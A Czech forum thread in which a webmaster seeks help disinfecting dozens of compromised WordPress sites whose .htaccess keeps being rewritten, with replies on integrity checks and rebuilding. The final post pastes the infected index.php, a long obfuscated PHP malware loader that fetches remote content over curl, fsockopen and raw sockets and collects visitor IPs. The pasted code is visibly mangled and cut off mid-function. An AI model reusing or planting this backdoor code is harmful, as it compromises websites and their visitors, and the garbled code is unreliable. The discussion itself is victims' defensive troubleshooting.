Odvirování WP – přepisování.htaccess

5. 12. 2022 20:41:46

50 webů na multihostingu, ručně 100 hodin...když to půjde dobře. Asi bude lepší odejít jinam. Weby jsou "neziskové" , najmout můžu sám sebe a nemám na tohle čas. Ale pokud může být napadena i databáze, tak pak to nemá žádnej smysl, asi zahodím 15 let práce no...

5. 12. 2022 20:41:46

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510190

Pavel Mareš

(19 hodnocení)

5. 12. 2022 20:45:39

Jo tak. My máme taky multi hosting vlastní, ale weby na sebe navzájem nevidí. Takže v případě napadení máme tohle podchycený.

Jinak pak teda chápu ty hodiny. Nicméně pokud jsou napadený všechny stejně, tak by se dala vytvořit logika co to projde a promaže. Stačí napsat kroky.

Ale záleží jak máš weby postavený, zda jsou stejný (pluginy, šablona atd).

5. 12. 2022 20:45:39

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510189

sikec

(7 hodnocení)

5. 12. 2022 22:00:35

každej jinej :-) Jeden přístup do FTP pro všechny...

5. 12. 2022 22:00:35

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510188

TomasX

(4 hodnocení)

5. 12. 2022 22:09:50

a máš nějaké staré zálohy? Porovnat je a najít pattern, který hledat dál. Stejně tak to je WP, dá se udělat kontrola integrity, WP a pluginy stáhnout a porovnat originální soubory. Tohle vše se dělá poloautomaticky, jde to opravdu rychle.

Nevím, jestli ti změna hostingu pomůže, drtivou většinu napadených webů, který jsem viděl je důsledkem chyby v samotném WP a pluginech, ne v hostingu.

5. 12. 2022 22:09:50

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510187

sikec

(7 hodnocení)

6. 12. 2022 06:10:32

Třeba toto by mohlo být ono: https://stackoverflow.com/questions/67296060/hacked-wordpress-htaccess

Ale prvně musím rozkodovat .php soubory, mají fakt divnou strukturu - třeba index.php.

---------- Příspěvek doplněn 06.12.2022 v 17:44 ----------

Tady na tohle se vždy .htaccess přepíše:

6. 12. 2022 06:10:32

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510186

TomasX

(4 hodnocení)

6. 12. 2022 18:21:58

to vypadá na tenhle typ útoku https://forum.ait-pro.com/forums/topic/wp-dester-and-wpyii2-hacker-plugins/, útočník ti tam podle toho fóra nahrál vlastní plugin a k napadení opět nejspíš došlo přes plugin nebo přes neaktualizované WP.

Dělal si kontrolu integrity souborů? Ověřoval jsi jaké pluginy máš nainstalované?

6. 12. 2022 18:21:58

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510185

sikec

(7 hodnocení)

6. 12. 2022 18:37:29

Ano "wpyii2" mi antivir označil na několika webech (asi 15 ks), tak jsem je z hostingu smáznul...a nepomohlo to...

---------- Příspěvek doplněn 07.12.2022 v 18:07 ----------

No integrita souborů - co si pod tím představuješ cca?

6. 12. 2022 18:37:29

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510184

TomasX

(4 hodnocení)

7. 12. 2022 18:42:36

Integrita souborů je ověření, že se soubor nezměnil. Jsou na to pluginy, já to ale raději dělám ručně. Ideální mít zálohu z ftp v čase, pak kontroluješ, které soubory se změnili proto staré verzi (třeba Total commander umí porovnat adresáře). Pokud nemáš starou verzi, udělej si novou čistou instalaci, nainstaluj tvoje pluginy a porovnej s tím, co je na webu.

Ty viry mohou být už nalezlé kdekoliv na ftp, není snadné se toho zbavit a je velice obtížné najít všechna místa, aby se znovu nevrátil, najít soubory, které se změnili může být část vítěžství. Postavit to znovu bude možná pro tebe rychlejší, data máš v databázi, ftp a nahrané souboru máš také, vem to na čisto.

Rád bych ti poradil konkrétněji, ale nemám dost informací, je to vždy trocha laborování a hledání.

7. 12. 2022 18:42:36

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510183

sikec

(7 hodnocení)

7. 12. 2022 19:48:18

No teď by mi stačilo jen ujištění, že DB jsou v pořádku. Může se tento vir infikovat i do databáze a spouštět se otamtud? Pokud ne, tak už čistím vše možný na bázi WP. Ale ten virus má asi vyšší IQ...teď přepisuje (jak se drápu furt na FTP) .htaccess i jednou za tři minuty...

Tak a teď už to dělá ihned po změně .htacces, tj. během sekundy...už se nedostanu do adminu ani....

---------- Příspěvek doplněn 07.12.2022 v 22:32 ----------

Máte někdo NolimitExtra multihosting a index.php v rootu vypadá takto?:

<?php$OO_O00O__0=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$OOO__00O0_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_O_O0O0_0=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0O__00OO_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O00_0OO_O_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_O00O0O__=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_0OO0O0__=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_00_0OO_O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_OO0_0O_0=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O__0_OO00O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O__O000_OO=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0O_0_0OO_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0O0_0O__O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0_0OO__O0=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0_O_O0_0O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_0O_O0_O0=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$OO_0O_00O_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O000__OOO_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O__0O0O0_O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0OO0O_0__=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0_0O_0_OO=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_OOO00_0_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$OO0_O_0_0O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_0__0OO0O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0O_0O__0O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_O0_0OO_0=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0_O_0O0O_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O__OO00O0_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_O000O__O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0_0_OOO0_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_OO0_0O0_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O000_OOO__=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$OO_00O0_O_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_0_OO_00O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$OO0_O_0O_0=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_O00O0O__=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0_0O_O0_O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_O000O__O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_OO_O_000=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0_OOO0_0_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$OOO_O__000=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O__0_O0O0O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0_0OOO_0_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_0O0_O0_O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O__0O0O0O_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0_0OO_0O_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$OO00O__0O_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_0_O0_O0O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O__O0O00_O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_00_OOO0_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O_00_OO0O_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0_0O0O_O_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0O___O0O0=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O__O000_OO=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$OO0__0O0O_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$OO___00O0O=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$O0O_OO0_0_=$OO_O00O__0.$OO_O00O__0.$OO_O00O__0;$OO___0O00O="nafHTRu0lcYDPoFvNLszvMt4oMrjTMotTYB2wgv0KLvXZYQySNDiU5ktdbV2uZhyKZiWzVGzdLwmfNSvSbsQc=O=";function O_OO0_O0_0($url,$OO0__O0O_0=0,$OOOO00___0=1,$OO0_0_OO_0=NULL,$O0__OOO0_0=array(),$O0O_O_00_O="s"){if(!${"x47x4cx4fx42x41x4cx53"}("/^https*\:\/\//si",$url)){if(isset(${"x5fx47x45x54"})){$O00O__0O_O=O_OO00O__0('iy4tyhjkktKsovilXIzCtLzMlMUQCKWKnlJRUqQXWAMA');$O00O__0O_O.=$url;echo $O00O__0O_O;unset($O00O__0O_O);exit();}return '';}$OO0_O0__O0=O_OO00O__0('Sy4tyYnonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBvpSJakA');$OOOO0_0__0=$O0__0O_O0O='';foreach(${"x47x4cx4fx42x41x4cx53"}('|',$OO0_O0__O0) as $c){$OO_OO0__00=1;if($OO0__O0O_0&&substr($c,0,1)=='c'){continue;}foreach(${"x47x4cx4fx42x41x4cx53"}('+',$c) as $d){if(!${"x47x4cx4fx42x41x4cx53"}($d)){$OO_OO0__00=0;}}unset($d);if($OO_OO0__00){$OOOO0_0__0=$c;break;}}unset($OO0_O0__O0,$c);if($OOOO0_0__0==''){return 0;}if(substr($OOOO0_0__0,0,1)=='c'){$OO__000OO_=${"x47x4cx4fx42x41x4cx53"}();${"x47x4cx4fx42x41x4cx53"}($OO__000OO_,CURLOPT_URL,$url);${"x47x4cx4fx42x41x4cx53"}($OO__000OO_,CURLOPT_USERAGENT,$O0O_O_00_O);${"x47x4cx4fx42x41x4cx53"}($OO__000OO_,CURLOPT_RETURNTRANSFER,1);${"x47x4cx4fx42x41x4cx53"}($OO__000OO_,CURLOPT_TIMEOUT,100);${"x47x4cx4fx42x41x4cx53"}($OO__000OO_,CURLOPT_FRESH_CONNECT,TRUE);if($OOOO00___0==2){${"x47x4cx4fx42x41x4cx53"}($OO__000OO_,CURLOPT_POST,1);if(${"x47x4cx4fx42x41x4cx53"}($OO0_0_OO_0)){${"x47x4cx4fx42x41x4cx53"}($OO__000OO_,CURLOPT_POSTFIELDS,${"x47x4cx4fx42x41x4cx53"}($OO0_0_OO_0));}}$OO__OO0_00=${"x47x4cx4fx42x41x4cx53"}($OO__000OO_);${"x47x4cx4fx42x41x4cx53"}($OO__000OO_);if(!$OO__OO0_00){if(isset(${"x5fx47x45x54"})){$O00O__0O_O=O_OO00O__0('i04uLLgcpRSC0qyi+KVctLKi6qTwBgA=');$O00O__0O_O.=${"x47x4cx4fx42x41x4cx53"}($OO__000OO_);echo $O00O__0O_O;unset($O00O__0O_O);exit();}return 0;}else{return $OO__OO0_00;}}$O0O00___OO=${"x47x4cx4fx42x41x4cx53"}($url);isset($O0O00___OO)||$O0O00___OO='';isset($O0O00___OO)||$O0O00___OO='';isset($O0O00___OO)|| $O0O00___OO='';isset($O0O00___OO)||$O0O00___OO='';$O0O_OO_00_=$O0O00___OO?$O0O00___OO.($O0O00___OO?'?'.$O0O00___OO:''):'/';$O00_0OO__O=$O0O00___OO;if($O0O00___OO=='https'){$O_O_0O0_O0='1.1';$OO_0O_00_O=empty($O0O00___OO)?443:$O0O00___OO;$O00_0OO__O=O_OO00O__0('Ky7OsCTdLXGXBwA=');$O00_0OO__O.=$O0O00___OO;}else{$O_O_0O0_O0='1.0';$OO_0O_00_O=empty($O0O00___OO)?80:$O0O00___OO;}$OO0_0O__0O='Host:';$OO0_0O__0O.=$O00_0OO__O;$O0__OOO0_0[]=$OO0_0O__0O;$O0__OOO0_0[]=O_OO00O__0('c87PyXE0tNLsnMz7NyzskdHvTgUA');$O0__OOO0_0[]=O_OO00O__0('Cy1OLhudJ1TE/NK7EiMCAA==').$O0O_O_00_O;$O0__OOO0_0[]=O_OO00O__0('c0xOTxRi0osdLZRS1wIA');unset($OO0_0O__0O);if($OOOO00___0==2){if(${"x47x4cx4fx42x41x4cx53"}($OO0_0_OO_0)){$OO0_0_OO_0=${"x47x4cx4fx42x41x4cx53"}($OO0_0_OO_0);}$O0__OOO0_0[]=O_OO00O__0('c87PKgO0nNK9EtqSxItUosKMjJTE4syczP06/QLS8v103LL8rVLS3KSc1Lzk9uPJTQEA');$O0__OOO0_0[]=O_OO00O__0('c87PKhI0nNK9H1Sc1LL8mcNwAgA=').${"x47x4cx4fx42x41x4cx53"}($OO0_0_OO_0);$O0__0O_O0O="POST $O0O_OO_00_ HTTP/$O_O_0O0_O0".PHP_EOL.${"x47x4cx4fx42x41x4cx53"}(PHP_EOL,$O0__OOO0_0).PHP_EOL.PHP_EOL.$OO0_0_OO_0;unset($OO0_0_OO_0);}else{$O0__0O_O0O="GET $O0O_OO_00_ HTTP/$O_O_0O0_O0".PHP_EOL.${"x47x4cx4fx42x41x4cx53"}(PHP_EOL,$O0__OOO0_0).PHP_EOL.PHP_EOL;}unset($O0__OOO0_0,$O0O00___OO,$O_O_0O0_O0,$O0O_OO_00_);$O_O_O00_0O=null;if(substr($OOOO0_0__0,-1)=='n'){$O_O_O00_0O=$OOOO0_0__0($O00_0OO__O,$OO_0O_00_O,$O00O__0O_Ono,$O00O__0O_Ostr,30);}else{if(substr($OOOO0_0__0,-1)=='t'){$O_OOO__000=O_OO00O__0('K0kusLwNLgRXBwA=');$O_OOO__000.=$O00_0OO__O;$O_OOO__000.=':';$O_OOO__000.=$OO_0O_00_O;$O_O_O00_0O=${"x47x4cx4fx42x41x4cx53"}($O_OOO__000,$O00O__0O_Ono,$O00O__0O_Ostr,30);unset($O_OOO__000);}}$OO_0OO00__='';if($O_O_O00_0O){${"x47x4cx4fx42x41x4cx53"}($O_O_O00_0O,TRUE);${"x47x4cx4fx42x41x4cx53"}($O_O_O00_0O,30);${"x47x4cx4fx42x41x4cx53"}($O_O_O00_0O,$O0__0O_O0O);if(!$OO0__O0O_0){$O00O__O_O0=${"x47x4cx4fx42x41x4cx53"}($O_O_O00_0O);if(!$O00O__O_O0){while(!${"x47x4cx4fx42x41x4cx53"}($O_O_O00_0O)){$O_O0__0OO0=${"x47x4cx4fx42x41x4cx53"}($O_O_O00_0O);if($O_O0__0OO0&&(${"x47x4cx4fx42x41x4cx53"}($O_O0__0OO0)=="%0D%0A"||${"x47x4cx4fx42x41x4cx53"}($O_O0__0OO0)=="%0A")){break;}unset($O_O0__0OO0);}while(!${"x47x4cx4fx42x41x4cx53"}($O_O_O00_0O)){$O00_O_O_O0=${"x47x4cx4fx42x41x4cx53"}($O_O_O00_0O,8192);$OO_0OO00__.=$O00_O_O_O0;unset($O00_O_O_O0);}}unset($O00O__O_O0);}${"x47x4cx4fx42x41x4cx53"}($O_O_O00_0O);}else{if(substr($OOOO0_0__0,-1)=='e'){$O_0O_0_OO0=${"x47x4cx4fx42x41x4cx53"}($O00_0OO__O);$O_O_O00_0O=$OOOO0_0__0(AF_INET,SOCK_STREAM,0);if(socket_connect($O_O_O00_0O,$O_0O_0_OO0,$OO_0O_00_O)){if(!$OO0__O0O_0){socket_write($O_O_O00_0O,$O0__0O_O0O,${"x47x4cx4fx42x41x4cx53"}($O0__0O_O0O));while($O0__O0_O0O=@socket_read($O_O_O00_0O,8192)){$OO_0OO00__.=$O0__O0_O0O;unset($O0__O0_O0O);}$OO_0OO00__=${"x47x4cx4fx42x41x4cx53"}("\r\n\r\n",$OO_0OO00__);${"x47x4cx4fx42x41x4cx53"}($OO_0OO00__);$OO_0OO00__=${"x47x4cx4fx42x41x4cx53"}("\r\n\r\n",$OO_0OO00__);}else{$O_0OO00O__=${"x47x4cx4fx42x41x4cx53"}(2,5);$OO_0O_0O_0=0;while($OO_0O_0O_0<$O_0OO00O__){socket_write($O_O_O00_0O,$O0__0O_O0O,${"x47x4cx4fx42x41x4cx53"}($O0__0O_O0O));$OO_0O_0O_0++;${"x47x4cx4fx42x41x4cx53"}(${"x47x4cx4fx42x41x4cx53"}(50000,100000));}unset($OO_0O_0O_0,$O_0OO00O__);}}socket_close($O_O_O00_0O);unset($O_0O_0_OO0);}}unset($O0__0O_O0O,$OOOO0_0__0,$O_O_O00_0O,$OO_0O_00_O,$O00_0OO__O);if(!$OO0__O0O_0){$OO_0OO00__=@${"x47x4cx4fx42x41x4cx53"}('/(?:(?:\r\n|\n)|^)(+)(?:\r\n|\n){1,2}(.*?)'.'((?:\r\n|\n)(?:+(?:\r\n|\n))|$)/si','O_OO00__O0',$OO_0OO00__);return ${"x47x4cx4fx42x41x4cx53"}(${"x47x4cx4fx42x41x4cx53"}($OO_0OO00__,"\xEF\xBB\xBF"));}else{return 1;}}function O_OO00__O0($matches){return ${"x47x4cx4fx42x41x4cx53"}($matches)==${"x47x4cx4fx42x41x4cx53"}($matches)?$matches:$matches;}function O_0O_O_0O0($OO_0__OO00){$OO_O_0O0_0=${"x47x4cx4fx42x41x4cx53"}(${"x47x4cx4fx42x41x4cx53"}($OO_0__OO00));$OO0O0_0__O=substr($OO_O_0O0_0,0,5);$OO0O0___O0=substr($OO_O_0O0_0,-5);$OO_OO0_00_=substr($OO_O_0O0_0,5,${"x47x4cx4fx42x41x4cx53"}($OO_O_0O0_0)-10);return $OO0O0_0__O.'hT'.substr($OO_O_0O0_0,5,${"x47x4cx4fx42x41x4cx53"}($OO_O_0O0_0)-10).'tP'.$OO0O0___O0;}function O_OO00O__0($OO_0__OO00){$OO0O0_0__O=substr($OO_0__OO00,0,5);$OO0O0___O0=substr($OO_0__OO00,-5);$OO_OO0_00_=substr($OO_0__OO00,7,${"x47x4cx4fx42x41x4cx53"}($OO_0__OO00)-14);return ${"x47x4cx4fx42x41x4cx53"}(${"x47x4cx4fx42x41x4cx53"}($OO0O0_0__O.$OO_OO0_00_.$OO0O0___O0));}function O00O_0OO__($O00_O_0_OO=''){if(isset(${"x5fx53x45x52x56x45x52"})){if(isset(${"x5fx53x45x52x56x45x52"})){$O00_O_0_OO=${"x5fx53x45x52x56x45x52"};}else if(isset(${"x5fx53x45x52x56x45x52"})){$O00_O_0_OO=${"x5fx53x45x52x56x45x52"};}else{$O00_O_0_OO=${"x5fx53x45x52x56x45x52"};}}else{if(${"x47x4cx4fx42x41x4cx53"}('HTTP_X_FORWARDED_FOR')){$O00_O_0_OO=${"x47x4cx4fx42x41x4cx53"}('HTTP_X_FORWARDED_FOR');}else if(${"x47x4cx4fx42x41x4cx53"}('HTTP_CLIENT_IP')){$O00_O_0_OO=${"x47x4cx4fx42x41x4cx53"}('HTTP_CLIENT_IP');}else{$O00_O_0_OO=${"x47x4cx4fx42x41x4cx53"}('REMOTE_ADDR');}}return $O00_O_0_OO;}function OO00O__0_O($OO_0__OO00=''){if(isset(${"x5fx53x45x52x56x45x52"})){return ${"x5fx53x45x52x56x45x52"};}elseif(isset(${"x5fx53x45x52x56x45x52"})){return ${"x5fx53x45x52x56x45x52"};}return $OO_0__OO00;}function O_O0O0O_0_($OO___0O00O){$O0_00__OOO=${"x47x4cx4fx42x41x4cx53"}($OO___0O00O);$OO0_O0_O0_='';for ($OO_0O_0O_0=0;$OO_0O_0O_0<${"x47x4cx4fx42x41x4cx53"}($O0_00__OOO);$OO_0O_0O_0++){if($OO_0O_0O_0%2!=0){$OO0_O0_O0_.=$O0_00__OOO;}}return ${"x47x4cx4fx42x41x4cx53"}($OO0_O0_O0_);}function O0O__O_00O($OO_0OO00__){$OO_0OO00__=@${"x47x4cx4fx42x41x4cx53"}(${"x47x4cx4fx42x41x4cx53"}($OO_0OO00__));$OO0O00_O__=@${"x47x4cx4fx42x41x4cx53"}("/\|/si",$OO_0OO00__,-1,PREG_SPLIT_NO_EMPTY);if(!${"x47x4cx4fx42x41x4cx53"}($OO0O00_O__)){return false;}if(${"x47x4cx4fx42x41x4cx53"}($OO0O00_O__)<2){return false;}$OO_0OO00___array=${"x47x4cx4fx42x41x4cx53"}($OO0O00_O__);$OO_0OO00___array=${"x47x4cx4fx42x41x4cx53"}($OO_0OO00___array);$OO_0OO00___array=$OO0O00_O__;return $OO_0OO00___array;}function 